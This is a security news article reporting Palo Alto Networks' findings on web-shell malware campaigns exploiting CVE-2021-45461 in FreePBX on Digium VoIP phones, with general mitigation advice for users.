Security researchers have discovered threat actors targeting Digium phones with different malware samples. The malware exploits a vulnerability in the VoIP phones’ software to install a web shell. Researchers advise users to stay vigilant about such attacks.
Malware Targeting Digium Phones
According to a recent post from Palo Alto Networks, their researchers found numerous malware campaigns targeting Digium Phones.
As explained, the threat actors implant web shells into the target Digium phones’ Elastix system to steal data. The web shell not only implants more payloads but also executes codes according to the attackers’ intended activity. The researchers could link this behavior with the CVE-2021-45461 vulnerability in the Rest Phone Apps (restapps) module of the FreePBX software.
The researchers started witnessing the malicious campaigns in December 2021. And until March 2022, they could detect over 500,000 unique malware samples linked with malicious traffic generated from Digium’s Asterisk software for VoIP phones.
Regarding the attack strategy, the researchers observed the initial attack vector dropping an obfuscated PHP backdoor in the file system. The malware then gained persistence by creating numerous root accounts and setting up scheduled tasks. Whereas the PHP web shell included random junk, possibly to evade detection.
The researchers have shared a detailed technical analysis of the malware in their post.
Users Must Stay Careful
The researchers could trace back the malware activity to Russian threat actors. Specifically, the IPv4 addresses geographically located within the Netherlands showed links with Russian websites via DNS lookup.
Within a span of a few months, the appearance of thousands of malware samples hints at the attackers’ prompt activities against Digium users. Therefore, the researchers urge the users to remain careful.
The strategy of implanting web shells in vulnerable servers is not a new tactic for malicious actors. The only way to catch advanced intrusions is a defense-in-depth strategy. Only by orchestrating multiple security appliances and applications in a single pane can defenders detect these attacks.
Some mitigation strategies that users can adopt include using a robust firewall to protect their VoIP systems, applying advanced URL filtering to detect and block malicious URLs, and blocking malicious IPs and AppIDs from accessing their networks.